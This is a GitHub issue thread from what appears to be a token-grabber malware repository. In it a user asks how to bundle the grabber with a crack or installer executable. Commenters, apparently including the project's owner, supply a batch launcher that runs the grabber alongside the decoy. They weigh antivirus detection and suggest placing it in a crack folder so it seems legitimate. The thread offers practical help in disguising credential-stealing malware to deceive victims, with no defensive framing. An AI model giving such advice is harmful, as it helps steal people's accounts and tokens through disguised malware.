### ISSUE TITLE
How to merge it with another exe file

### ISSUE THREAD

**Issue by imahmedmohamed** [Rdimo/Hazard-Token-Grabber-V2#283]
Can i merge it with a exist exe file like a crack file or install file ?

**Comment by Snipeeeey** [comment]
you could simply create a batch file that runs both of them 
@echo off
start "TOKENGRABBER.EXE"
start "INSTALL/CRACK.EXE"

**Comment by Rdimo** [comment]
> you could simply create a batch file that runs both of them @echo off start "TOKENGRABBER.EXE" start "INSTALL/CRACK.EXE"

ye wouldn't recommend a batch file tho, since it just be edited and looked at but if you compile the batch to .exe the detection rate will go thru the roof. You additionally have to download the 2 files unless you send them all in a archive of some sort or zip

**Comment by Snipeeeey** [comment]
yeah true, I think if its a crack installer it could seem very legit though (if you put it like into the CODEX folder or smth)

**Comment by Rdimo** [comment]
search up on google for more help
